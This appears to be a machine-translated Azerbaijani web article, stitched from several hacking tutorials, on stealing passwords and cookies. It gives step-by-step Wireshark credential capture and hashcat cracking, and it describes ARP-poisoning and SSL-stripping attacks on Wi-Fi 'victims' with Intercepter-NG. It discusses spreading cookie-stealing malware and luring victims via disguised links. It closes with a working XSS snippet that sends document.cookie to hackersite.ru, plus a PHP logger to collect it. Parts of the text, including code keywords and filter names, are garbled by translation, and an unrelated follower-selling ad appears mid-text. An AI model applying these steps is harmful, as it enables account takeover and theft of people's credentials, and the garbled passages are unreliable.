Kuki oğurluq üsulları. Kuki oğurluğu üsulları Məlumatlara fiziki giriş

Bir çox istifadəçilər qapalı internet resursunda qeydiyyatdan keçərkən və ya avtorizasiya edərkən loqin və şifrəni doldurmaqla və ENTER düyməsini sıxmaqla bu məlumatların asanlıqla ələ keçirilə biləcəyini belə başa düşmürlər. Çox vaxt onlar şəbəkə üzərindən təhlükəsiz formada ötürülür. Buna görə də, daxil olmağa çalışdığınız sayt HTTP protokolundan istifadə edirsə, o zaman bu trafiki çəkmək, Wireshark-dan istifadə edərək təhlil etmək, sonra parolu tapmaq və deşifrə etmək üçün xüsusi filtrlərdən və proqramlardan istifadə etmək çox asandır.

Parolların qarşısını almaq üçün ən yaxşı yer şəbəkənin nüvəsidir, burada bütün istifadəçilərin trafiki xarici resurslarda qeydiyyatdan keçərkən İnternetə daxil olmaq üçün qapalı resurslara (məsələn, poçt) və ya marşrutlaşdırıcının qarşısında gedir. Güzgü qurduq və özümüzü haker kimi hiss etməyə hazırıq.

Addım 1. Trafik ələ keçirmək üçün Wireshark-ı quraşdırın və işə salın

Bəzən bunun üçün yalnız trafiki tutmağı planlaşdırdığımız interfeysi seçmək və Başlat düyməsini sıxmaq kifayətdir. Bizim vəziyyətimizdə biz simsiz çəkirik.

Trafikin tutulmasına başlanılıb.

Addım 2. Tutulan POST trafikinin filtrlənməsi

Brauzeri açırıq və istifadəçi adı və şifrə ilə istənilən resursa daxil olmağa çalışırıq. Avtorizasiya prosesi başa çatdıqdan və saytın açılmasından sonra biz Wireshark-da trafiki ələ keçirməyi dayandırırıq. Sonra, protokol analizatorunu açın və çoxlu sayda paketləri görün. Bu, əksər İT mütəxəssislərinin bundan sonra nə edəcəklərini bilmədiklərinə görə imtina etdikləri mərhələdir. Ancaq biz bilirik və ehtiva edən xüsusi paketlərlə maraqlanırıq POST məlumatları, ekranda bir forma doldurarkən yerli maşınımızda yaradılır və göndərilir uzaq server brauzerdə "Giriş" və ya "Avtorizasiya" düyməsini kliklədiyiniz zaman.

Tutulan paketləri göstərmək üçün pəncərəyə xüsusi filtr daxil edin: http.xahiş.üsul == "POST"

Və min paket əvəzinə, axtardığımız məlumatlarla yalnız birini görürük.

Addım 3. İstifadəçi adı və şifrəni tapın

Tez sağ klikləyin və menyudan bir element seçin TCPSteam-i izləyin


Bundan sonra kodda səhifə məzmununu bərpa edən yeni pəncərədə mətn görünəcək. Parol və istifadəçi adına uyğun gələn "parol" və "istifadəçi" sahələrini tapaq. Bəzi hallarda, hər iki sahəni oxumaq asan olacaq və hətta şifrələnməyəcək, ancaq Mail.ru, Facebook, Vkontakte və s. kodlanmış:

HTTP/1.1 302 tapıldı

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OTRO STP IND DEM"

Set-Cookie:parol= ; başa çatır = Cümə axşamı, 07 Noyabr 2024 23:52:21 GMT; yol=/

Məkan: loggedin.php

Məzmun uzunluğu: 0

Əlaqə: yaxın

Məzmun növü: mətn/html; charset=UTF-8

Beləliklə, bizim vəziyyətimizdə:

İstifadəçi adı: networkguru

Şifrə:

Addım 4 Parolun şifrəsini açmaq üçün kodlaşdırma növünü müəyyənləşdirin

Biz, məsələn, http://www.onlinehashcrack.com/hash-identification.php#res saytına gedirik və identifikasiya pəncərəsində parolumuzu daxil edirik. Mənə prioritet sırasına görə kodlaşdırma protokollarının siyahısı verildi:

Addım 5: İstifadəçi parolunun şifrəsini açın

Bu mərhələdə biz hashcat yardım proqramından istifadə edə bilərik:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Çıxışda biz şifrələnmiş parol aldıq: simplepassword

Beləliklə, Wireshark-ın köməyi ilə biz proqram və xidmətlərin işində yaranan problemləri həll etməklə yanaşı, istifadəçilərin veb formalara daxil etdikləri parolları ələ keçirərək özümüzü haker kimi sınaya bilərik. Siz həmçinin göstərmək üçün sadə filtrlərdən istifadə edərək istifadəçi poçt qutuları üçün parolları tapa bilərsiniz:

  • POP protokolu və filtri belə görünür: pop.request.command == "USER" || pop.request.command == "KEÇİL"
  • IMAP protokolu və filtri belə olacaq: imap.request "giriş" ehtiva edir
  • SMTP protokolu və aşağıdakı filtri daxil etməlisiniz: smtp.req.command == "AUTH"

və kodlaşdırma protokolunun şifrəsini açmaq üçün daha ciddi yardım proqramları.

Addım 6. Trafik şifrələnirsə və HTTPS-dən istifadə edilirsə?

Bu suala cavab vermək üçün bir neçə variant var.

Seçim 1. İstifadəçi ilə server arasındakı əlaqəni kəsməyə qoşulun və əlaqə qurulduğu anda trafiki ələ keçirin (SSL Handshake). Bağlantının qurulması zamanı sessiya açarı ələ keçirilə bilər.

Seçim 2: Firefox və ya Chrome tərəfindən yazılmış sessiya açarı jurnalı faylından istifadə edərək HTTPS trafikinin şifrəsini aça bilərsiniz. Bunu etmək üçün brauzer bu şifrələmə açarlarını jurnal faylına yazmaq üçün konfiqurasiya edilməlidir (FireFox əsaslı nümunə) və siz bu jurnal faylını almalısınız. Əsasən, sessiya açarı faylını oğurlamalısınız sərt disk başqa istifadəçi (bu, qeyri-qanunidir). Yaxşı, sonra trafiki çəkin və şifrəni açmaq üçün alınan açarı tətbiq edin.

Aydınlaşdırılması. Söhbət parolu oğurlanan şəxsin veb brauzerindən gedir. Öz HTTPS trafikimizin şifrəsini açmağı nəzərdə tuturuqsa və məşq etmək istəsək, bu strategiya işləyəcək. Əgər siz digər istifadəçilərin kompüterlərinə daxil olmadan HTTPS trafikinin şifrəsini açmağa çalışırsınızsa, bu işləməyəcək - şifrələmə və məxfilik bunun üçündür.

Seçim 1 və ya 2-ə uyğun olaraq açarları aldıqdan sonra onları WireShark-da qeydiyyatdan keçirməlisiniz:

  1. Edit - Preferences - Protocols - SSL menyusuna keçin.
  2. "Birdən çox TCP seqmentini əhatə edən SSL qeydlərini yenidən yığın" bayrağını təyin edin.
  3. "RSA düymələri siyahısı" və "Edit" düyməsini basın.
  4. Bütün sahələrə məlumatları daxil edin və açarla fayla yolu yazın

Açıq nöqtələrin nə qədər təhlükəli olduğu haqqında wifi girişi, hansı parolların müdaxilə edə biləcəyi haqqında.

Bu gün biz proqramdan istifadə edərək Wi-Fi üzərindən parolların tutulmasını və Wi-Fi üzərindən kukilərin tutulmasını nəzərdən keçirəcəyik.

Hücum baş verəcək iyləmə.

iyləmə- iyləmək "iyləmək" kimi tərcümə olunur. Sniffing sizə şəbəkədəki şəbəkə fəaliyyətini təhlil etməyə, istifadəçinin hansı saytları ziyarət etdiyinə baxmaq və parolları ələ keçirməyə imkan verir. Lakin o, həm də faydalı məqsədlər üçün, internetə istənilən məlumatı göndərən virusları dinləmək üçün istifadə edilə bilər.


Göstərəcəyim üsul kifayət qədər primitiv və sadədir. Əslində proqramı daha güclü şəkildə istifadə edə bilərsiniz.
sniff.su proqramının rəsmi saytı (linki kopyalayın və yeni sekmədə açın), bölmədə yükləyə bilərsiniz. Yüklə.
Windows, Unix sistemləri və Android üçün versiya var.
Windows üçün nəzərdən keçirəcəyik, çünki bu, ən populyar sistemdir və buradakı proqram ən qabaqcıldır.
Brauzeriniz və ya antivirusunuz proqramın təhlükəli olduğuna and içə bilər, lakin siz özünüz bunun hack proqramı olduğunu başa düşürsünüz və o, həmişə buna reaksiya verəcəkdir.
Proqram yüklənir zip arxivi, proqramı yalnız paketdən çıxarmaq və bir qovluğa qoymaq lazımdır və heç bir şey quraşdırmaq lazım deyil.
Proqram Wi-Fi şəbəkələrində müxtəlif Mitm hücumlarını təşkil etmək imkanına malikdir.
Məqalə sırf məlumat məqsədləri üçün yazılmışdır, açıq WiFi nöqtələrinin təhlükələrini nümunə göstərmək üçün, bu hərəkətlərdən hər hansı birini öz təhlükə və riskinizlə yerinə yetirirsiniz. Mən sizə başqa insanların məlumatlarını qoruyan cinayət məsuliyyətini xatırlatmaq istəyirəm.

Xidmət avi1 Instagram profiliniz üçün izləyicilər sifariş etmək imkanı üçün nəfəs kəsən ucuz qiymətlər təklif edir. Çox səy və vaxt sərf etmədən indi şəbəkədə və ya satışda populyarlığın artmasına nail olun.

Intercepter NG ilə işləmək

Beləliklə, proqram Intercepter-NG.exe vasitəsilə işə salınır.
Proqramın ingilis dili interfeysi var, lakin siz özünüzə güvənən kompüter istifadəçisisinizsə, məncə, bunu başa düşəcəksiniz.

Aşağıda quraşdırma ilə bağlı video olacaq (oxumaqdan daha rahat baxanlar üçün).
- Əgər onlardan bir neçəsi varsa, yuxarıda istədiyiniz şəbəkəni seçin.
- keçid növü Ethernet/WiFi, əgər sizdə Wi-Fi varsa, onda siz Wi FI işarəsini seçməlisiniz (şəbəkə seçiminin solunda)

- Düyməyə bas Skan rejimi(radar işarəsi)
- Boş sahədə, sağ klikləyin və daxil olun kontekst menyusu smart scan
- Şəbəkəyə qoşulmuş bütün cihazlar göstəriləcək
- Qurban seçin (hər kəsi sıxaclı seçə bilərsiniz Shift düyməsi), sadəcə marşrutlaşdırıcının özünü qeyd etməyin, onun IP adətən 192.168.1.1-dir.
- Seçim üzərinə sağ klikləyin və klikləyin nat-a əlavə edin


- Nişana keçin Nat
- IN gizli ip sonuncu rəqəmi boş olan hər hansı bir rəqəmə dəyişmək məsləhətdir, bu sizin real IP-nizi gizlədəcək.
- işarələri qoyun SSL zolağıSSL Mitm.


- Basın Parametrlər(sağda dişlilər).
- Bir onay işarəsi qoyun dirilmə(Bu, parolları və şifrələnmiş kukiləri ələ keçirəcək HTTPS protokolu) və Çək Spoof IP/Mac. işarələyə bilərsiniz peçenye qatili, onun sayəsində qurban, məsələn, cari səhifədən atılacaq sosial şəbəkə və qurban parolu yenidən daxil etməli olacaq və biz ona müdaxilə edəcəyik. Parametrləri şəkillə müqayisə edin.


- Burada parametr tamamlandı, parametrləri işarə ilə bağlayın.
“Quraşdırma tamamlandı, siz hücuma başlaya bilərsiniz.
- Yuxarıdakı düyməni basın Qoxulamağa başlayın/dayandırın(üçbucaq), eyni pəncərədə aşağıdakı radiasiya işarəsinə klikləyin ARP Zəhərini Başlat/Stop
- Nişana keçin parol rejimi və pəncərədə sağ klikləyin və seçin Kukiləri göstərin("Bu, qurbanların daxil etdiyi kukiləri və parolları göstərəcək")
Hər şey, kiminsə parolu daxil etməsini gözləyirik.
Bəzən elə olur ki, İnternet işləməyi dayandırır, İnternetə özünüz daxil olmağa çalışın, işləmirsə, proqramı yenidən başladın.
Parolun ələ keçirilməsinin həmişə mümkün olmadığını fərq etdim, amma əslində o, demək olar ki, uğursuz işləyir.

Hamısı budur, biz Wi-Fi üzərindən parolların tutulmasını və Wi-Fi üzərindən kukilərin tutulmasını nəzərdən keçirdik.

özünə yaxşı bax

Peçenye oğurlamağın yolları

Cookie hacking əla işləyir və bir çox hakerlər tərəfindən istifadə olunur. Əgər siz də sınamaq istəyirsinizsə, amma nə edəcəyinizi bilmirsinizsə, tövsiyələrimizi oxuyun.

Kukilər nədir?

Bu, istifadəçinin müəyyən bir sayta səfəri haqqında məlumatdır. Ayrı bir yerdə saxlanılır mətn sənədi. Orada müxtəlif məlumatlar tapa bilərsiniz. O cümlədən loginlər, parollar, ünvanlar poçt qutuları və telefon nömrələri. Ona görə də oğurluq edənlər bu sənədlərə əl atmağa çalışırlar. Doğru materialları oğurlamaq üçün hakerlər müxtəlif üsullara əl atırlar.

Peçenye oğurlamağın yolları

XSS zəifliyi

Onu istənilən saytda tapmaq və istifadə etmək olar. Mütəxəssis zəiflik tapdıqda, ona iynə vurur xüsusi kod. Məqsədindən asılı olaraq, kodlar fərqlidir, onlar müəyyən bir resurs üçün yazılır. İstifadəçi bu səhifəyə daxil olduqda və onu yenilədikdə, bütün dəyişikliklər tətbiq olunur. Kod hərəkətə başlayır - qurbanın kompüterinə daxil edilir və hamısını toplayır zəruri məlumatlar brauzerdən.

Kod daxil etmək üçün istənilən növ zəiflikdən - veb resursda, brauzerdə və ya kompüter sistemində xətadan istifadə edə bilərsiniz.

XSS hücumlarının 2 növü var:

Passiv - səhifə skriptinə yönəldilmişdir. Bu halda, səhifə elementlərində zəiflikləri axtarmaq lazımdır. Məsələn, dialoqları olan tab, axtarış qutusu, video kataloqu və s.

Aktiv - onlar serverdə axtarılmalıdır. Xüsusilə tez-tez müxtəlif forumlarda, bloglarda və söhbətlərdə olurlar.

Bir insanı XSS ​​tətbiq etməyə necə məcbur etmək olar?

Tapşırıq asan deyil, çünki kodu aktivləşdirmək üçün tez-tez onunla əlaqəni sıxmaq lazımdır. Siz linki maskalayıb maraqlı təkliflə birlikdə məktubla göndərə bilərsiniz. Məsələn, onlayn mağazada böyük endirim təklif edin. Siz həmçinin bütün bunları şəkilə yerləşdirə bilərsiniz. İstifadəçi çox güman ki, ona baxır və heç nədən şübhələnmir.

Sniffer quraşdırılması

Bu icra ixtisaslaşdırılmış proqramlar başqasının cihazında trafiki izləmək üçün. Sniffer sizə digər insanların məlumatları ilə ötürülən seansları tutmağa imkan verir. Beləliklə, siz bütün giriş və şifrələri, ünvanları, hər hansı birini əldə edə bilərsiniz vacib məlumat istifadəçi tərəfindən şəbəkə üzərindən ötürülür. Eyni zamanda, hücumlar ən çox qorunmayan HTTP məlumatlarına həyata keçirilir. Təminatsız wi-fi bunun üçün yaxşı işləyir.

Sniffer tətbiq etməyin bir neçə yolu var:

  • Trafiki kopyalayın;
  • Trafik hücumlarından istifadə edərək məlumatların təhlili;
  • İnterfeyslərə qulaq asmaq;
  • Bir snifferin kanal fasiləsinə tətbiqi.
Cookie dəyişdirilməsi

Bütün məlumatlar orijinal formada veb serverdə saxlanılır. Onları dəyişdirsəniz, bu, əvəzetmə hesab olunacaq. Bütün alınan materiallar başqa bir kompüterdə istifadə edilə bilər. Beləliklə alacaqsınız tam giriş istifadəçinin şəxsi məlumatlarına. Kukilər brauzer parametrləri, əlavələr və ya xüsusi proqramlar vasitəsilə dəyişdirilə bilər. Redaktə hər hansı bir şəkildə mümkündür standart notepad pc-də.

Bir virus ilə peçenye oğurlamaq

Mütəxəssislər, kukilərə xüsusi ehtiyac olmadığı təqdirdə istifadə etməməyi məsləhət görürlər. Onları söndürmək mümkündürsə, bunu etmək daha yaxşıdır. Bunun səbəbi kukilərin çox həssas olmasıdır. Çox vaxt oğrular tərəfindən oğurlanırlar. Bu fayllardan çoxlu sayda şəxsi məlumat əldə edə bilərsiniz. məxfi informasiya bir şəxsə qarşı istifadə etmək. Ən təhlükəli fayl növləri sessiya bitdikdən sonra sistemdə qalanlardır.

Kukilər tez-tez bir virus yardım proqramından istifadə edərək oğurlanır. Bu olduqca sadə şəkildə edilir. Hər hansı bir təhlükəsiz yardım proqramı kompüterdə müəyyən materialları toplayan bir virusla birləşdirilir. Virus proqramı hostun serverinə qoşulacaq. Proqram elə konfiqurasiya edilməlidir ki, brauzer onu proxy server kimi istifadə etsin.

Proqram qurbanın kompüterinə daxil olduqda, o, avtomatik olaraq bütün saxlanan məlumatları toplamağa başlayacaq və sizə göndərəcəkdir.

Viruslar fərqlidir, onların funksiyaları da fərqli ola bilər. Bəziləri brauzeri tamamilə idarə etməyə və istənilən məlumatı nəzərdən keçirməyə imkan verir. Digərləri qorunan materialları oğurlamağa qadirdir. Digərləri isə yalnız təminatsız məlumat toplayır.

Başqasının kompüterində virus proqramının tətbiqi ilə bağlı çətinlik çəkə bilərsiniz. İstifadəçini onu yükləməyə və işə salmağa məcbur etmək lazımdır. Burada ya ona proqrama keçidi olan məktub göndərə bilərsiniz, ya da proqramı təhlükəsiz hesab edib həmin şəxsin onu saytınızdan yükləməsini gözləyə bilərsiniz.

Kukiləri oğurluqdan necə qorumaq olar?

Veb resurslarının əksəriyyəti kifayət qədər təhlükəsiz deyil. Hakerlər bu platformalarda zəiflikləri və səhvləri asanlıqla tapırlar.

Kukilərin qorunması qaydaları:

  1. Kompüter identifikatorunu cari sessiyaya bağlayın. Sonra, üçüncü tərəf cihazından sayta daxil olduqda, yeni sessiya başlayacaq və əvvəlkindən məlumat əldə edilə bilməz.
  2. Sessiyanı brauzerə bağlayın. Əvvəlki bənddə olduğu kimi eyni prinsip işləyəcək.
  3. Şəbəkə üzərindən ötürülən parametrləri şifrələyin. Sonra sənəddə saxlanılan məlumat başa düşülə bilməz. Qarşısını alana faydasız olacaq. Bu texnika sizi 100% qoruya bilməyəcək, bəzi mütəxəssislər istənilən materialı deşifrə edə bilərlər.
  4. Yaradın ayrı qovluq indekslər üçün.

Kukilər vasitəsilə başqasının hesabından parolu necə tapmaq olar?

Başqasının məlumatlarını avtorizasiya üçün əldə etmək üçün əvvəlcə onların saxlandığı fayla daxil olmalısınız.

İstifadə edənlər üçün Mozilla Firefoxəsas menyuda yerləşən alətlər sekmesine keçməlisiniz. Daha sonra sistem parametrlərində "Qoruma" bölməsini tapacaqsınız və orada sosial şəbəkələrdəki hesablar haqqında bütün vacib məlumatları axtarmalısınız. Bütün parollar gizlidir, ona görə də "göstər" düyməsini sıxın. Burada qoruma qura və xüsusi kod qoya bilərsiniz. Onda sizdən başqa heç kim bu məlumatı almayacaq.

Operada ümumi baxış üçün yalnız istifadəçi adları mövcuddur. Ancaq menyuda parol menecerini tapa və kompüterdə saxlanan hər şeyi görə bilərsiniz. Tam siyahı menecerdədir. Parollara giriş əldə etmək üçün əlavə genişləndirmə quraşdırmalısınız.

IN Google Chrome bütün bu materiallar qabaqcıl parametrlərdə görünə bilər. Bütün saxlanmış kukilərin olduğu tab var.

Təəssüf ki, standart İnternet brauzeri Explorer-də belə xüsusiyyətlər yoxdur. PC sahibinin ziyarət etdiyi veb platformalar haqqında məlumat tapmaq üçün xüsusi proqram yükləməlisiniz. İnternetdə pulsuz tapıla bilər, tamamilə təhlükəsizdir, lakin onu etibarlı mənbələrdən yükləmək daha yaxşıdır. Unutmayın ki, hər hansı bir proqram antivirus tərəfindən yoxlanılmalıdır. Bu, xüsusilə parollarla işləyən kommunal proqramlar üçün doğrudur.

Bu texnika yalnız qurbanın kompüterinə fiziki girişi olanlar üçün uyğundur. Əgər şəxs sizin kompüteriniz vasitəsilə platformaya daxil olub öz məlumatlarını saxlayıbsa, başqasının parolunu da öyrənə bilərsiniz.

Kukiləri oğurlamaq üçün proqramlar

İnternetdə hakerlərin bir-biri ilə əlaqə saxladığı bir çox haker forumları var. İnsanlar ora getmək ümidi ilə gedirlər pulsuz yardım. Orada sındırmaq üçün çox sayda müxtəlif proqram tapa bilərsiniz. Sizi xəbərdar etmək istəyirik ki, bu proqramlara etibar etməməlisiniz. Başqasının cihazından kukiləri uzaqdan oğurlamaq üçün utilitlər dummies və ya virus proqramlarıdır. Bu proqramı kompüterinizə yükləsəniz, çox güman ki, özünüz də fırıldaqçının tələsinə düşəcəksiniz. Pulsuz yer proqramları fırıldaqçılar. Beləliklə, onlar virus proqramlarını paylayır və digər insanların fərdi kompüterləri üzərində nəzarəti əldə edirlər. Ümumiyyətlə, bu cür proqramlar fırıldaqdır, bunu interfeysinə və məzmununa görə başa düşəcəksiniz. Faylları çıxarmaq üçün hər hansı bir proqramdan istifadə edəcəksinizsə, o zaman sniffers olsun. Təbii ki, onlardan istifadə etmək asan deyil. İnternetdə yaxşı sniffer tapmaq asan deyil. Amma bu cür proqram təminatı onu sizə pul müqabilində sata bilən mütəxəssislərdən əldə etmək olar. Unutmayın ki, çoxlu fırıldaqçılar var, hər kəsin öz hiylələri var. Yalnız yaxşı reputasiyası olan, rəyləri olan və öz veb saytı olan sübut edilmiş hakerlərə etibar etməlisiniz.

Sonda qeyd etmək istərdim ki, peçenye oğurlamaq həqiqətən güclü bir üsuldur, effektivliyi çox yüksəkdir. Sosial şəbəkədə və ya messencerdə kiminsə profilini sındırmaq istəyirsinizsə, bu seçimi mütləq nəzərdən keçirin. Bu üsul qurbanın kompüterindən istifadə edə bildiyiniz zaman daha yaxşı işləyir. Məsafədən material əldə etmək daha çətindir, lakin siz bizim məsləhətimizi götürüb bu üsulu praktikada tətbiq etməyə çalışa bilərsiniz.

Bölmədə

Artıq daxil olduğunuz sayta qayıtdığınız zaman saytın sizi tanıdığını və sonuncu dəfə tətbiq etdiyiniz parametrlərlə açıldığını görmüsünüzmü? Bəli və tez-tez? Bu, sayəsində baş verir Peçenyelər, giriş, parol, sessiya identifikatoru və ziyarətçini identifikasiya etmək və resursa sonuncu səfəri zamanı seçdiyi istifadəçi seçimlərinə uyğun olaraq səhifə məzmununu göstərmək üçün tələb olunan digər dəyişənlər kimi ziyarətçilər haqqında məlumatları saxlayan. WebCookiesSniffer proqramı istifadəçiyə brauzerdə istifadəçi tərəfindən baxılan saytların kukilərini və onların məzmununu göstərəcək.

Kukilərə baxış

Siz saytı açırsınız və WebCookiesSniffer ələ keçirir Peçenyelər real vaxtda. Utilit bütün tutulan kukiləri host, sorğu yolu, kuki faylının ümumi uzunluğu, kuki faylındakı dəyişənlərin sayını və dəyişənlərin və dəyərlərin adları ilə Kuki sətirinin özü haqqında məlumatları saxlayan cədvələ əlavə edir. WebCookiesSniffer kukiləri haqqında toplanmış məlumatı saxlaya bilər mətn faylı. Proqram həmçinin bütün və ya seçilmiş kukilər üzrə HTML hesabatı yaratmaq imkanına malikdir. Proqramın işləməsi üçün WinPcap sürücüsünü quraşdırmalısınız (o, WebCookiesSniffer ilə birlikdə arxivdədir). Dilə WebCookiesSniffer proqramları rus oldu, WebCookiesSniffer_lng.ini faylını (həmçinin arxivə daxildir) yardım proqramı ilə qovluğa köçürün.

WebCookiesSniffer-in ekran görüntüləri



Kuki nədir?

Http serverinə istifadəçinin kompüterində bəzilərini saxlamağa imkan verən mexanizm var mətn məlumatı və sonra onunla əlaqə saxlayın. Bu məlumat kuki adlanır. Əslində, hər bir kuki bir cütdür: parametrin adı və dəyəri. Hər bir kukiyə aid olduğu domen də təyin edilir. Təhlükəsizlik məqsədləri üçün bütün brauzerlərdə http serverinə yalnız öz domen kukisinə daxil olmağa icazə verilir. Bundan əlavə, kukilərin istifadə müddəti ola bilər, bu halda bütün brauzer pəncərələri bağlı olsa belə, bu tarixə qədər onlar kompüterdə saxlanılacaq.


Kukilər niyə vacibdir?

Bütün çox istifadəçili sistemlərdə istifadəçini müəyyən etmək üçün kukilərdən istifadə olunur. Daha doğrusu, istifadəçinin xidmətlə cari əlaqəsi, istifadəçi sessiyası. Əgər kimsə kukilərinizi tanıyarsa, sizin adınıza daxil ola bilər. Çünki hazırda çox az sayda internet resursları bir istifadəçi seansı zamanı IP ünvanının dəyişməsini yoxlayır.


Kukiləri necə dəyişdirmək və ya dəyişmək olar?

Brauzer tərtibatçıları kukiləri redaktə etmək üçün daxili alətlər təqdim etmirlər. Ancaq adi notepad (notepad) ilə məşğul ola bilərsiniz.


Addım 1: mətnlə mətn faylı yaradın

Windows Reyestr redaktoru Versiya 5.00



@="C:\\IE_ext.htm"

Biz onu IE_ext.reg adı altında saxlayırıq

Addım 2: Yaradılmış fayldan istifadə edərək, Windows reyestrinə dəyişikliklər əlavə edin.

Addım 3: mətnlə mətn faylı yaradın

< script dil = "javascript">
external.menuArguments.clipboardData.setData("Mətn" , xarici.menuArguments.document.cookie);

xarici.menuArguments.document.cookie= "testname=test dəyəri; yol =/; domain=testdomain.ru";
xəbərdarlıq (xarici.menuArguments.document.cookie);


Onu C:\IE_ext.htm kimi yadda saxlayın

Addım 4: Bizi maraqlandıran veb saytına gedirik.

Addım 5: Sağ klikləyin siçan klikləyir boş yer səhifəni seçin və menyu elementini seçin "Kukilərlə işləmək". Mübadilə buferinə girişə icazə verin. Buferiniz olacaq kuki verilir vebsayt. Onların notepadını (notepad) yapışdırıb baxa bilərsiniz.


Addım 6: Bəzi kukiləri dəyişmək üçün C:\IE_ext.htm faylını dəyişdirərək redaktə edin test adı peçenye adına, test dəyəri- mənasına görə, testdomain.ru- veb sayt domeninə. Lazım gələrsə, buna bənzər daha çox sətir əlavə edin. Nəzarətin rahatlığı üçün mən cari kukilərin çıxışını dəyişiklikdən əvvəl və sonra skriptə əlavə etdim: xəbərdarlıq (xarici.menuArguments.document.cookie);

Addım 7: Addım 5-i yenidən işə salın və sonra səhifəni yeniləyin.

Aşağı xətt: yenilənmiş kukilərlə bu İnternet resursuna keçəcəyik.

JavaScript ilə kukiləri necə oğurlamaq olar?

Təcavüzkar qurbanın kompüterində ixtiyari JavaScript skriptini yerinə yetirmək üçün bir yol tapıbsa, o zaman cari kukiləri çox asanlıqla oxuya bilər. Misal:


varstr=document.cookie;

Amma o, onları öz saytına köçürə biləcəkmi, çünki əvvəldə qeyd etdiyim kimi, JavaScript skripti əlavə təsdiq olmadan başqa domendə yerləşən sayta daxil ola bilməyəcək? Məlum olub ki, JavaScript skripti istənilən http serverində yerləşən istənilən şəkli yükləyə bilər. Eyni zamanda, yükləmə sorğusundakı istənilən mətn məlumatını bu şəkilə köçürün. Misal: http://hackersite.ru/xss.jpg?text_info Beləliklə, bu kodu işlətsəniz:

varimg= newImage();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);


sonra kukilər "şəklin" endirilməsi və təcavüzkara "tərk edilməsi" sorğusunda olacaq.

Bir "şəkil" yükləmək üçün bu cür sorğuları necə idarə etmək olar?

Təcavüzkar yalnız hostinq tapmalıdır php dəstəyi və kodu belə yerləşdirin:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt", "a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Sonra bu skriptin bütün sorğu parametrləri faylda saxlanacaq log.txt. Əvəz etmək üçün yalnız əvvəllər təsvir edilmiş JavaScript skriptində qalır http://hackersite.ru/xss.jpg bu php skriptinə gedən yola.


Nəticə

Mən XSS zəifliklərindən istifadə etməyin ən sadə yolunu göstərdim. Lakin bu sübut edir ki, çox istifadəçili İnternet saytında ən azı bir belə zəifliyin olması təcavüzkarın öz resurslarından sizin adınıza istifadə etməsinə imkan verə bilər.